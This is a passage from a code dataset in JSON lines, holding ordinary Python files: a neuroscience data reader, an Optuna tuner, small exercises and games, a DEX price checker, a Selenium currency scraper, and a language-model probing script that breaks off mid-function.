+{"seq_id":"18497580247","text":"import logging\nimport os\nfrom pathlib import Path\nfrom typing import Optional, Tuple, Union\n\nimport numpy as np\nfrom element_interface.utils import find_full_path\nfrom intern import array\nfrom PIL import Image\nfrom PIL.Image import _fromarray_typemap\nfrom requests import HTTPError\n\nfrom .. import volume\nfrom ..bossdb import BossDBURLs\n\nlogger = logging.getLogger(\"datajoint\")\n\n\nclass BossDBInterface(array):\n def __init__(\n self,\n channel: Union[Tuple, str],\n session_key: Optional[dict] = None,\n volume_id: Optional[str] = None,\n **kwargs,\n ) -> None:\n\n try:\n super().__init__(channel=channel, **kwargs)\n self._exists = True\n except HTTPError as e:\n if e.response.status_code == 404 and not kwargs.get(\"create_new\", False):\n self._exists = False\n return\n else:\n raise e\n\n self._session_key = session_key or dict()\n\n # If not passed resolution or volume IDs, use the following defaults:\n self._volume_key = dict(\n volume_id=volume_id or self.collection_name + \"/\" + self.experiment_name,\n resolution_id=self.resolution,\n )\n\n @property\n def exists(self):\n return self._exists\n\n def _infer_session_dir(self):\n root_dir = volume.get_vol_root_data_dir()[0]\n inferred_dir = (\n f\"{self.collection_name}/{self.experiment_name}/{self.channel_name}/\"\n )\n os.makedirs(Path(root_dir) / inferred_dir, exist_ok=True)\n return inferred_dir\n\n def _import_resolution(self, skip_duplicates=True):\n volume.Resolution.insert1(\n dict(\n resolution_id=self.resolution, # integer 0-6\n voxel_unit=self.voxel_unit, # axis order is either ZYX or XYZ\n voxel_z_size=self.voxel_size[0 if self.axis_order[0] == \"Z\" else 2],\n voxel_y_size=self.voxel_size[1],\n voxel_x_size=self.voxel_size[2 if self.axis_order[0] == \"Z\" else 0],\n ),\n skip_duplicates=skip_duplicates,\n )\n\n def _import_volume(self, data: np.ndarray = None, skip_duplicates=True):\n volume.Volume.insert1(\n dict(\n **self._session_key,\n **self._volume_key,\n z_size=self.shape[0 if self.axis_order[0] == \"Z\" else 2],\n y_size=self.shape[1],\n x_size=self.shape[2 if self.axis_order[0] == \"Z\" else 0],\n channel=self.channel_name,\n collection_experiment=f\"{self.collection_name}_{self.experiment_name}\",\n url=f\"bossdb://{self._channel.get_cutout_route()}\",\n volume_data=data,\n ),\n skip_duplicates=skip_duplicates,\n )\n\n def _import_segmentation(self, data: np.ndarray = None, skip_duplicates=True):\n volume.Segmentation.insert1(\n dict(**self._volume_key, segmentation_data=data),\n skip_duplicates=skip_duplicates,\n allow_direct_insert=True,\n )\n\n def _string_to_slice_key(self, string_key: str) -> Tuple:\n output = tuple()\n items = string_key.strip(\"[]\").split(\",\")\n for index, item in enumerate(items):\n if item == \":\": # select all for dimension\n start, stop = (0, self.shape[index])\n elif \":\" in item: # select slice of dimension\n start, stop = list(map(int, item.split(\":\")))\n else: # select a single slice\n start = int(item)\n stop = start + 1\n output = (*output, slice(start, stop))\n if len(output) == 1: # If only on dimension provided, assume Z\n if self.axis_order[0] == \"Z\":\n return (output[0], slice(0, self.shape[1]), slice(0, self.shape[1]))\n else:\n return (slice(0, self.shape[0]), slice(0, self.shape[1]), output[0])\n return output\n\n def _slice_key_to_string(self, slice_key: Tuple[Union[int, slice]]) -> str:\n outputs = []\n for item in slice_key:\n if item.stop == item.start + 1:\n outputs.append(f\"{item.start}\")\n else:\n 
outputs.append(f\"{item.start}:{item.stop}\")\n return \"[\" + \",\".join(outputs) + \"]\"\n\n def _download_slices(\n self,\n slice_key: Tuple[Union[int, slice]],\n data: np.ndarray,\n extension: str = \".png\",\n image_mode: str = None,\n ):\n\n xs, ys, zs = self._normalize_key(key=slice_key)\n zoom = f\"ZoomX{xs[0]}-{xs[1]}_Y{ys[0]}-{ys[1]}\"\n\n # If associated session, use that dir. Else infer and mkdir\n if self._session_key:\n session_path = volume.get_session_directory(self._session_key)\n else:\n session_path = self._infer_session_dir()\n file_name = f\"Res{self.resolution}_{zoom}_Z%d{extension}\"\n file_path = find_full_path(volume.get_vol_root_data_dir(), session_path)\n file_path_full = str(file_path / file_name)\n\n if len(data.shape) == 1: # if getitem returned single array, try unwrapping\n data = data[0]\n if len(data.shape) == 2: # getitem returned single z-slice\n data = data[np.newaxis, :]\n\n for z in range(zs[0], zs[1]):\n # Z is used as absolute reference within dataset.\n # When saving data, 0-indexed based on slices fetched\n Image.fromarray(data[z - zs[0]], mode=image_mode).save(file_path_full % z)\n logger.info(f\"Saved Z-slices {zs[0]} to {zs[1]}:\\n{file_path}/\")\n\n def insert_channel_as_url(self, data_channel=\"Volume\", skip_duplicates=True):\n collection_key = dict(\n collection_experiment=self.collection_name + \"_\" + self.experiment_name\n )\n with BossDBURLs.connection.transaction:\n BossDBURLs.insert1(collection_key, skip_duplicates=skip_duplicates)\n getattr(BossDBURLs, data_channel).insert1(\n dict(\n url=f\"bossdb://{self._channel.get_cutout_route()}\", **collection_key\n ),\n skip_duplicates=skip_duplicates,\n )\n\n def load_data_into_element(\n self,\n table: str = \"Volume\",\n slice_key: Union[Tuple[Union[int, slice]], str] = \"[:]\", # Default full data\n save_images: bool = False,\n save_ndarray: bool = False,\n extension: str = \".png\",\n skip_duplicates=False,\n image_mode=None,\n ):\n # NOTE: By accepting a slice here, we could download pngs and/or store ndarrays\n # that are a subset of the full volume with x and y start/stop limits. These\n # limits are not noted as part of the ndarray insert, but are tracked via\n # filename for images. We could (a) prevent loading partial volumes or (b) add\n # fields/tables to track this information. I previously included a Zoom table\n\n if isinstance(slice_key, str):\n slice_key = self._string_to_slice_key(slice_key)\n\n data = self.__getitem__(key=slice_key) if save_images or save_ndarray else None\n\n if (\n save_images\n and not image_mode\n and ((1, 1), str(data.dtype)) not in _fromarray_typemap\n ):\n image_mode_options = set(i[0] for i in _fromarray_typemap.values())\n raise ValueError(\n \"Datatype is not supported for saving. 
Please select one of the \"\n + f\"following and pass it as `image_mode`: {image_mode_options}\\n\"\n + \"See also docs for PIL.Image.fromarray\"\n )\n\n self._import_resolution()\n\n if table == \"Volume\":\n self._import_volume(\n data=data if save_ndarray else None, skip_duplicates=skip_duplicates\n )\n elif table == \"Segmentation\":\n self._import_segmentation(\n data=data if save_ndarray else None, skip_duplicates=skip_duplicates\n )\n elif table == \"Connectome\":\n raise ValueError(\"BossDB API does not yet support fetching connectome.\")\n\n if save_images:\n self._download_slices(slice_key, data, extension, image_mode)\n","repo_name":"CBroz1/element-volume","sub_path":"element_volume/readers/bossdb.py","file_name":"bossdb.py","file_ext":"py","file_size_in_byte":8240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
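A hedged usage sketch for the BossDBInterface record above; the channel path and session key are illustrative placeholders (not a verified dataset), and running it needs BossDB network access plus a configured element-volume pipeline:

    from element_volume.readers.bossdb import BossDBInterface

    # 'collection/experiment/channel' is a placeholder path, not a real dataset
    boss = BossDBInterface("bossdb://collection/experiment/channel", session_key={"session_id": 0})
    if boss.exists:
        # register resolution + volume metadata and save two z-slices as PNGs
        boss.load_data_into_element(table="Volume", slice_key="[0:2]", save_images=True)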
+{"seq_id":"26076106570","text":"import logging\nimport warnings\nfrom abc import ABCMeta, abstractclassmethod\nfrom functools import partial\nfrom pathlib import Path\nfrom typing import Optional\n\nimport neptune.new.integrations.optuna as optuna_utils\nimport optuna\nfrom hydra.utils import get_original_cwd\nfrom neptune.new import Run\nfrom omegaconf import DictConfig, OmegaConf\nfrom optuna.pruners import HyperbandPruner\nfrom optuna.samplers import BaseSampler, CmaEsSampler, RandomSampler, TPESampler\nfrom optuna.study import Study\nfrom optuna.trial import FrozenTrial\n\nwarnings.filterwarnings(\"ignore\")\n\n\nclass BaseTuner(metaclass=ABCMeta):\n def __init__(self, config: DictConfig, run: Optional[Run] = None):\n self.config = config\n self.run = run\n\n @abstractclassmethod\n def _objective(self, trial: FrozenTrial, config: DictConfig) -> float:\n \"\"\"\n Objective function\n Args:\n trial: trial object\n config: config object\n Returns:\n metric score\n \"\"\"\n raise NotImplementedError\n\n def build_study(self, verbose: bool = False) -> Study:\n \"\"\"\n Build study\n Args:\n study_name: study name\n Returns:\n study\n \"\"\"\n try:\n # define study\n neptune_callback = optuna_utils.NeptuneCallback(\n self.run,\n plots_update_freq=1,\n log_plot_slice=False,\n log_plot_contour=False,\n )\n study = optuna.create_study(\n study_name=self.config.search.study_name,\n direction=self.config.search.direction,\n sampler=create_sampler(\n mode=self.config.search.mode, seed=self.config.search.seed\n ),\n pruner=HyperbandPruner(\n min_resource=self.config.search.min_resource,\n max_resource=self.config.search.max_resource,\n reduction_factor=self.config.search.reduction_factor,\n ),\n )\n\n # define callbacks\n objective = partial(self._objective, config=self.config)\n\n # optimize\n study.optimize(\n objective,\n n_trials=self.config.search.n_trials,\n callbacks=[neptune_callback],\n )\n\n self.run.stop()\n\n except TypeError:\n # define study\n study = optuna.create_study(\n study_name=self.config.search.study_name,\n direction=self.config.search.direction,\n sampler=create_sampler(\n mode=self.config.search.mode, seed=self.config.search.seed\n ),\n pruner=HyperbandPruner(\n min_resource=self.config.search.min_resource,\n max_resource=self.config.search.max_resource,\n reduction_factor=self.config.search.reduction_factor,\n ),\n )\n\n # define callbacks\n objective = partial(self._objective, config=self.config)\n\n # optimize\n study.optimize(objective, n_trials=self.config.search.n_trials)\n\n if verbose:\n self.display_study(study)\n\n return study\n\n def save_hyperparameters(self, study: Study) -> None:\n \"\"\"\n Save best hyperparameters to yaml file\n Args:\n study: study best hyperparameter object.\n \"\"\"\n path = Path(get_original_cwd()) / self.config.search.path_name\n update_params = OmegaConf.load(path)\n\n update_params.model.params.update(study.best_trial.params)\n\n OmegaConf.save(update_params, path)\n\n @staticmethod\n def display_study(study: Study) -> None:\n \"\"\"\n Display best metric score and hyperparameters\n Args:\n study: study best hyperparameter object.\n \"\"\"\n logging.info(\"Best trial:\")\n trial = study.best_trial\n logging.info(f\" Value: {trial.value}\")\n logging.info(\" Params: \")\n for key, value in trial.params.items():\n logging.info(f\" '{key}': {value},\")\n\n\ndef create_sampler(mode: str, seed: int) -> BaseSampler:\n \"\"\"\n Create sampler\n Args:\n sampler_mode: sampler mode\n seed: seed\n Returns:\n BaseSampler: sampler\n \"\"\"\n if 
mode == \"random\":\n sampler = RandomSampler(seed=seed)\n elif mode == \"tpe\":\n sampler = TPESampler(seed=seed)\n elif mode == \"cma\":\n sampler = CmaEsSampler(seed=seed)\n else:\n raise ValueError(f\"Unknown sampler mode: {mode}\")\n\n return sampler\n","repo_name":"ds-wook/predict-meals","sub_path":"src/tuning/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4657,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"91"}
+{"seq_id":"11389909074","text":"# Tic Tac Toe game\n# Make for the practicepython.org website Exercise 29\n\n\n# This function does the checking to see if a List of 3 items in the board is a winner or not\ndef checking_(array):\n\n\tif all(x == \"X\" for x in array):\n\t\t# 1 is player 1 is the winner\n\t\treturn 1\n\telif all(o == \"O\" for o in array):\n\t\t# 2 is player 2 is the winner\n\t\treturn 2\n\telse:\n\t\t# No winner\n\t\treturn 0\n\n# This will break and board into various parts for the analyze function to check.\ndef board_analyze(board_state):\n\twinner = 0\n\t# This will send horizontal parts to be check\n\tfor val in range(3):\n\t\twinner = checking_(board_state[val])\n\t\tif winner == 1 or winner == 2:\n\t\t\treturn winner\n\n\t# This will send the vertical parts to be check\n\tfor x in range(3):\n\t\tvertical_holder = []\n\t\tfor y in range(3):\n\t\t\tvertical_holder.append(board_state[y][x])\n\t\twinner = checking_(vertical_holder)\n\t\tif winner == 1 or winner == 2:\n\t\t\treturn winner\n\t\n\t# This checks the two horizontals\n\tdiagonal1 = checking_([board_state[1][1], board_state[0][0], board_state[2][2]])\n\tdiagonal2 = checking_([board_state[1][1], board_state[0][2], board_state[2][0]])\n\n\tif diagonal1 != 0:\n\t\treturn diagonal1\n\telif diagonal2 != 0:\n\t\treturn diagonal2\n\n\t# Ultimate returns the winner 0 if nobody wins\n\treturn winner\n\n# This handles the moves and draw the boards for the player\ndef do_move(board_state, player_move, move_counter):\n\tsymbol = (\"X\" if move_counter % 2 == 1 else \"O\")\n\tmove = player_move.strip().split(\",\")\n\tboard = board_state\n\ttry: \n\t\tassert(board_state[int(move[0])][int(move[1])] == 0)\n\t\tboard_state[int(move[0])][int(move[1])] = symbol\n\texcept:\n\t\tprint(\"*************INVALID MOVE************\")\n\t\treturn board_state, move_counter\n\tmove_counter += 1\n\treturn board_state, move_counter\n\n# the internal data structureis [[0,0,0],[0,0,0],[0,0,0]]\n# Draws the board\ndef draw_game_box(internal_board_state_array):\n\tfor x in range(3):\n\t\tprint(\" ----- \"*3)\n\t\tfor y in range(3):\n\t\t\tprint(f\" | {'-' if internal_board_state_array[x][y] == 0 else internal_board_state_array[x][y]} |\", end=(\" \" if y < 2 else \"\\n\"))\n\t\tprint(\" ----- \"*3)\n\n# Main game\ndef tic_tac_toe():\n\ttotal_moves = 1\n\twinner = 0\n\t# Initial board state\n\tgame_board = [[0,0,0],[0,0,0],[0,0,0]]\n\n\tprint(\"Welcome to the Tic-Tac-Toe Game!\")\n\tplayer1_name = input(\"What is the first player name? >>>> \").strip()\n\tplayer2_name = input(\"What is the second player name? >>>> \").strip()\n\n\tprint(f\"\\n******* {player1_name} VS {player2_name} ******* \")\n\n\n\tdraw_game_box(game_board)\n\t# Runs infinitely until all valid moves are done.\n\twhile total_moves <= 9:\n\t\t# Moves must be inputed as >>>> 1,2 [row,col]\n\t\tmove = input(\"Where would you like to move? 
Please input the coordinates as >>>> row, col \")\n\t\tgame_board, total_moves = do_move(game_board, move, total_moves)\n\t\tdraw_game_box(game_board)\n\t\twinner = board_analyze(game_board)\n\t\tif winner == 1:\n\t\t\tprint(f\"***************Congratulations {player1_name} you won!!!********************\")\n\t\t\tbreak\n\t\tif winner == 2:\n\t\t\tprint(f\"***************Congratulations {player2_name} you won!!!********************\")\n\t\t\tbreak\n\n\tif winner == 0:\n\t\tprint(\"Nobody won!\")\n\t\texit()\n\nif __name__ == '__main__':\n\ttic_tac_toe()","repo_name":"dtdao/learning-python-django","sub_path":"exercise29.py","file_name":"exercise29.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"34615554523","text":"import math\n\ndef f(x):\n return 3 * math.sin(2 * x)\n\ndef analytical(x):\n return (2 - 0.75 * x) * math.cos(2 * x) + 1.5 * math.sin(x) * math.cos(x)\n\nn = 10\np = 0.0\nq = 4.0\na = analytical(0)\nb = analytical(1)\nys = [[], []]\n\ndef getC1():\n return (b - ys[0][n]) / ys[1][n]\n\ndef getYi(i):\n return ys[0][i] + getC1() * ys[1][i]\n\nprint(\"МЕТОД СТРЕЛЬБЫ:\")\nprint(\"y'' + %0.1fy' + %0.1fy = (2 - 0.75*x)*cos(2x) + 1.5*sin(x)*cos(x)\" % (p, q))\nprint(\"y(0) = %f\" % a)\nprint(\"y(1) = %f\" % b)\nprint(\"Количество разбиений: %d\" % n)\nh = 1.0 / float(n)\nprint(h)\n\ndelta = h * 100\nxs = []\nfor i in range(n + 1):\n xs.append(float(i) * h)\nfor i in range(2):\n ys[i] = [a, a + delta]\nys[1] = [0, delta]\n\nfor i in range(1, n):\n ys[0].append((h * h * f(xs[i]) + (2.0 - q * h * h) * ys[0][i] - (1.0 - h / 2 * p) * ys[0][i - 1]) / (1 + h / 2 * p))\n ys[1].append(((2.0 - q * h * h) * ys[1][i] - (1.0 - h / 2 * p) * ys[1][i - 1]) / (1 + h / 2 * p))\n\ny = []\nfor i in range(n + 1):\n y.append(getYi(i))\nprint(len(y))\n\nmaxR = 0.0\n\nfor i in range(len(y)):\n print(\"x=%.1f, y=%.6f, y*=%.6f |y-y*|=%.6f\" % (float(i) * h, analytical(xs[i]), y[i], math.fabs(y[i] - analytical(xs[i]))))\n if math.fabs(y[i] - analytical(xs[i])) > maxR:\n maxR = math.fabs(y[i] - analytical(xs[i]))\n\nprint(\"||y-y*||=%.6f\" % maxR)","repo_name":"lozovska/NumericalMethods","sub_path":"4/streljba.py","file_name":"streljba.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"40363963475","text":"'''\nBai 11-1\n@author: packkkk\n'''\n\n# Code goes here\nfrom bai11modules import read_report_file, read_file\n\ntry:\n filename = input('Input filename: ')\n content = read_file(filename)\n read_report_file(filename)\nexcept Exception as error:\n print('Error: ', error)\n ","repo_name":"ngcvm/python-fundamental","sub_path":"bai11/bai11-2.py","file_name":"bai11-2.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"7047710911","text":"class Solution:\n def minOperations(self, nums: List[int], numsDivide: List[int]) -> int:\n nums.sort()\n \n d = numsDivide[0]\n \n for x in numsDivide:\n d = gcd(d, x)\n \n for i, x in enumerate(nums):\n if d % x == 0:\n return i\n \n return -1","repo_name":"hwennnn/leetcode-solutions","sub_path":"problems/minimum_deletions_to_make_array_divisible/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"91"}
+{"seq_id":"39548032752","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 8 14:48:15 2022\n\n@author: Peter\n\"\"\"\n\nimport configparser\n\nimport dmd_control\nimport basis_generation\n\n\n\n#grabs the parameters for the program from config file 'config.ini'\ndef get_config_parameters():\n config = configparser.ConfigParser()\n config.read(\"config.ini\")\n basis_parameters = {\n \"basis_type\": config.get(\"pattern\", \"basis_type\"),\n \"basis_size\": config.getint(\"pattern\", \"basis_size\"),\n \"sensing_area\": config.getint(\"pattern\", \"sensing_area\"),\n \"top_left_x\": config.getint(\"pattern\", \"top_left_x\"),\n \"top_left_y\": config.getint(\"pattern\", \"top_left_y\"),\n }\n\n return (\n config.getint(\"compression\", \"compression_percent\"),\n basis_parameters,\n config.get(\"file handling\", \"basis_indices_filename\"),\n )\n\n\n#save the indices of the hadamard patterns to file\ndef write_basis_indices_to_file(filename, basis_indices):\n basis_index_file = open(filename, 'w')\n for index in basis_indices:\n basis_index_file.write(str(index)+'\\n')\n basis_index_file.close()\n \n \ndef main():\n\n percent_compression, basis_params, basis_indices_filename = get_config_parameters()\n\n #get basis patterns. default hadamard\n basis_patterns, basis_indices = basis_generation.generate_bases(\n basis_type=basis_params[\"basis_type\"], \n basis_size=basis_params[\"basis_size\"],\n percent_compression=percent_compression\n )\n \n write_basis_indices_to_file(basis_indices_filename, basis_indices)\n \n if basis_params[\"sensing_area\"] is not basis_params[\"basis_size\"]:\n basis_patterns = basis_generation.pp_enlarge_patterns(basis_patterns, basis_params[\"sensing_area\"])\n \n dmd_control.run_dmd(basis_patterns, (basis_params[\"top_left_x\"], basis_params[\"top_left_y\"]))\n\n \n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Alexander2116/DMD---PSI","sub_path":"Archive/compressive_sensing.py","file_name":"compressive_sensing.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"4572031371","text":"import copy\nclass Matrix:\n\n\tdef __init__(self, matrice):\n\t\tself.matrice = matrice\n\n\t@staticmethod\n\tdef print(A): \n\t\tfor j in A:\n\t\t\tfor i in j:\n\t\t\t\tprint(i, end=\" \")\n\t\t\tprint()\n\t\treturn ''\n\n\t@staticmethod\n\tdef getminor(mas,k): \n\t\tres=[]\n\t\tfor r in mas[1:]:\n\t\t\trow=[]\n\t\t\tfor j in range(len(r)):\n\t\t\t\tif j != k:\n\t\t\t\t\trow.append(r[j])\n\t\t\tres.append(row)\n\t\treturn res\n\n\t@staticmethod\n\tdef getdet(mas):\n\t\tn=len(mas)\n\t\tif n==2:\n\t\t\treturn mas[0][0]*mas[1][1]-mas[0][1]*mas[1][0]\n\t\tdet = 0\n\t\tsign = 1\n\t\tfor i in range(n):\n\t\t\tdet=det+sign*mas[0][i]*Matrix.getdet(Matrix.getminor(mas,i))\n\t\tsign=-sign\n\t\treturn det \n\n\tdef __gt__(self, other): \n\t\treturn (Matrix.getdet(self.matrice) > Matrix.getdet(other.matrice))\n\n\tdef __lt__(self, other):\n\t\treturn (Matrix.getdet(self.matrice) < Matrix.getdet(other.matrice))\n\n\tdef __eq__(self, other):\n\t\treturn (Matrix.getdet(self.matrice) == Matrix.getdet(other.matrice))\n\n\tdef __add__(self, other):\n\t\tA = copy.deepcopy(self.matrice)\n\t\tfor i in range(len(A)):\n\t\t\tfor i2 in range(len(other.matrice[i])):\n\t\t\t\tA[i][i2] = self.matrice[i][i2] + other.matrice[i][i2]\n\t\treturn Matrix.print(A)\n\n\tdef __mul__(self, other): \n\t\ts = 0\n\t\tA = copy.deepcopy(self.matrice)\n\t\tfor i in range(len(A)):\n\t\t\tfor i2 in range(len(other.matrice[i])):\n\t\t\t\tfor z in range(len(A[i2])):\n\t\t\t\t\ts = s + self.matrice[i][z] * other.matrice[z][i2]\n\t\t\t\t\tA[i][i2] = s\n\t\t\t\t\ts = 0\n\t\treturn Matrix.print(A)\n\nx1 = Matrix([[45,2],[1,8]])\nx2 = Matrix([[8,19],[22,69]])\nif x1 > x2:\n\tprint('x1 > x2')\n\nif x1 < x2:\n\tprint('x1 < x2')\n\nif x1 == x2:\n\tprint('x1 == x2')\n\nprint()\nprint('Сумма: ')\nprint(x1 + x2)\nprint('Произведение: ')\nprint(x1 * x2)\n","repo_name":"asdsa7/Laba3_VEB","sub_path":"laba3.py","file_name":"laba3.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"41494810042","text":"# Custom imports\nfrom web3_stuff.apeSwap import run_ape\nfrom web3_stuff.gravity import run_gravity\nfrom web3_stuff.polycat import run_polycat\nfrom web3_stuff.quickSwap import run_quick\nfrom web3_stuff.sushiSwap import run_sushi\n\nfrom web3_stuff.global_constants import AVAILABLE_TOKENS\n\nALL_EXCHANGES = {\n \"APESWAP\": run_ape,\n \"GRAVITY\": run_gravity,\n \"POLYCAT\": run_polycat,\n \"QUICKSWAP\": run_quick,\n \"SUSHISWAP\": run_sushi,\n}\n\n# Function consuming a dicts of exchange names and a token name\n# calling the run function for each exchange given\n# returning a list of priceData dicts\ndef run_exchanges(data: dict[list[str], str]):\n exchanges: list = data[\"exchanges\"]\n token: str = data[\"token\"]\n\n token_addr = next(\n item for item in AVAILABLE_TOKENS if item[\"token_name\"] == token\n )\n\n exchange_prices = []\n for exchange in exchanges:\n func = ALL_EXCHANGES.get(exchange)\n exchange_data = func(token_addr[\"token_addr\"])\n\n exchange_prices.append(exchange_data)\n\n return exchange_prices\n","repo_name":"Danglebary/dex-price-checker-v1","sub_path":"backend-python/web3_stuff/price_discovery_machine.py","file_name":"price_discovery_machine.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"13948502417","text":"#Importamos o selenium para trabalhar com as páginas da web\nfrom selenium import webdriver as opcoes_selenium_aula\nfrom selenium.webdriver.common.keys import Keys\n\n#Importando a biblioteca do pyautogui para trabalhar com o tempo e teclas do teclado\nimport pyautogui as tempoPausaComputador\n\n#Usuando o pyautogui para controlar o teclado\nimport pyautogui as teclasAtalhoTeclado\n\n#Usando o By para trabalhar com as atualizações mais recentes\nfrom selenium.webdriver.common.by import By\n\n#Passamos autorização ao acesso as configurações do Chrome\nmeuNavegador = opcoes_selenium_aula.Chrome()\nmeuNavegador.get('https://www.google.com.br/')\n\ntempoPausaComputador.sleep(4)\n\n#Procurando pelo elemento NAME e quando encontrar vou escrever Dolar hoje\nmeuNavegador.find_element(By.NAME, \"q\").send_keys(\"Dolar hoje\")\n\ntempoPausaComputador.sleep(4)\n\n#Retorna para o campo name q\n#Faz a busca do valor que está digitado no campo NAME q\nmeuNavegador.find_element(By.NAME, \"q\").send_keys(Keys.RETURN)\n\ntempoPausaComputador.sleep(4)\n\n\nvalorDolarPeloGoogle = meuNavegador.find_elements(By.XPATH, '//*[@id=\"knowledge-currency__updatable-data-column\"]/div[1]/div[2]/span[1]')[0].text\n\ntempoPausaComputador.sleep(4)\n\nprint(valorDolarPeloGoogle)\n\n#-----------------------------------------------------------------------------------------------------\n\ntempoPausaComputador.sleep(2)\n\n#Retorna para o campo name q\n#Faz a busca do valor que está digitado no campo NAME q\nmeuNavegador.find_element(By.NAME, \"q\").send_keys(\"\")\n\ntempoPausaComputador.sleep(4)\n\n#Estamos usando o pyautogui para apertar a tecla TAB\nteclasAtalhoTeclado.press('tab')\n\ntempoPausaComputador.sleep(4)\n\n#Estamos usando o pyautogui para apertar a tecla enter\n#Enter para limpar o campo de pesquisa\nteclasAtalhoTeclado.press('enter')\n\ntempoPausaComputador.sleep(4)\n\n#Procurando pelo elemento NAME e quando encontrar vou escrever Dolar hoje\nmeuNavegador.find_element(By.NAME, \"q\").send_keys(\"Euro hoje\")\n\ntempoPausaComputador.sleep(4)\n\n#Retorna para o campo name q\n#Faz a busca do valor que está digitado no campo NAME q\nmeuNavegador.find_element(By.NAME, \"q\").send_keys(Keys.RETURN)\n\ntempoPausaComputador.sleep(4)\n\n\nvalorEuroPeloGoogle = meuNavegador.find_elements(By.XPATH, '//*[@id=\"knowledge-currency__updatable-data-column\"]/div[1]/div[2]/span[1]')[0].text\n\ntempoPausaComputador.sleep(4)\n\nprint(valorEuroPeloGoogle)\n\n#----------------------------------------------------------------------------------------------------------------------------------\n\nimport xlsxwriter \nimport os\n\nnomeCaminhoArquivo = \"C:\\\\Users\\\\Pedro W\\\\Desktop\\\\PYTHON_GERAL\\\\PythonRPA\\\\Extraindo Valor do Dolar e Euro e Salvando no Excel\\\\Imprime Dolar e Euro Google.xlsx\"\nplanilhaCriada = xlsxwriter.Workbook(nomeCaminhoArquivo)\nsheet1 = planilhaCriada.add_worksheet()\n\n#Escervendo nas células\nsheet1.write(\"A1\", \"Dolar\")\nsheet1.write(\"B1\", \"Euro\")\nsheet1.write(\"A2\", valorDolarPeloGoogle)\nsheet1.write(\"B2\", valorEuroPeloGoogle)\n\n#Substituir a vírgula por ponto \nvalorDolarPeloGoogle = valorDolarPeloGoogle.replace(',','.')\nvalorEuroPeloGoogle = valorEuroPeloGoogle.replace(',','.')\n\n#Convertendo o valor do Dolar e do Euro de Sting para Float\nvalor_Dolar_Tipo_Float = float(valorDolarPeloGoogle)\nvalor_Euro_Tipo_Float = float(valorEuroPeloGoogle)\n\nsheet1.write(\"A3\", valor_Dolar_Tipo_Float)\nsheet1.write(\"B3\", valor_Euro_Tipo_Float)\n\n#Fechando o 
arquivo do Excel que está em segundo plano\nplanilhaCriada.close()\n\n#Abro o arquivo\nos.startfile(nomeCaminhoArquivo)\n\n","repo_name":"PedroWilkinson/Python_RPA","sub_path":"Extrair_Euro_Dolar_Excel.py","file_name":"Extrair_Euro_Dolar_Excel.py","file_ext":"py","file_size_in_byte":3498,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"594508509","text":"import pickle \n\nimport torch\nimport os\nfrom torch import Tensor \nfrom typing import List \nfrom lstm.model import RNNModel \nfrom conllu import parse_incr, TokenList\nfrom tqdm import tqdm\nimport numpy as np \n\npos_w2i = dict()\npos_i2w = dict()\nlast = 0\n\nfrom lstm.model import RNNModel\n\n# READ DATA\n# If stuff like `: str` and `-> ..` seems scary, fear not! \n# These are type hints that help you to understand what kind of argument and output is expected.\ndef parse_corpus(filename: str) -> List[TokenList]:\n \"\"\"Parses a conllu file into a List of TokenLists\"\"\"\n data_file = open(filename, encoding=\"utf-8\")\n\n ud_parses = list(parse_incr(data_file))\n return ud_parses\n\ndef fetch_sen_reps(ud_parses: List[TokenList], model, tokenizer, concat=True, get_pos = False, shuffled=False) -> List[Tensor]:\n \"\"\"\n Returns a list of length len(ud_parses), or a tensor of total_word_len * repr_size.\n \"\"\"\n if get_pos:\n global last, pos_w2i, pos_i2w\n pos_result = []\n \n model.eval()\n model.cuda()\n doing_lstm = type(model) == RNNModel\n sentences_result = []\n global_words = []\n for sentence_nr, sentence in tqdm(enumerate(ud_parses)):\n sentence_words = []\n if shuffled:\n random_indices = np.arange(len(sentence))\n np.random.shuffle(random_indices )\n #print(random_indices)\n\n # First build string sentence repr with spaces and such\n for i, real_token in enumerate(sentence):\n token = real_token if not shuffled else sentence[random_indices[i]]\n if get_pos:\n postag = token['upostag']\n if postag in pos_w2i:\n posindex = pos_w2i[postag]\n else:\n posindex = last\n pos_w2i[postag] = last \n pos_i2w[last] = postag \n last += 1\n pos_result.append(posindex)\n \n if token['misc'] is not None:\n # SpaceAfter = False\n next_word = token['form']\n else:\n # SpaceAfter = True\n next_word = token['form'] + ' '\n sentence_words.append(next_word)\n # Now build model representation!\n \n #print(sentence_words)\n\n # Also add to global_words to retain word representations\n global_words.append(sentence_words)\n \n # In case of LSTM\n if doing_lstm:\n the_input = torch.tensor([tokenizer[z.strip()] for z in sentence_words]).unsqueeze(0)\n with torch.no_grad():\n final = model(the_input, model.init_hidden(1))\n final = final.squeeze(0)\n assert len(final) == len(sentence_words), \"Something is wrong..\"\n sentences_result.append(final)\n \n # In case of Transformer\n else:\n representation = []\n sizes = [] \n for i,word in enumerate(sentence_words):\n if i>0 and sentence_words[i-1][-1] == ' ':\n e = tokenizer.encode(' ' + word.strip())\n representation += e\n sizes.append(len(e))\n else:\n e = tokenizer.encode(word.strip())\n representation += e\n sizes.append(len(e))\n the_input = torch.tensor(representation).cuda()\n with torch.no_grad():\n 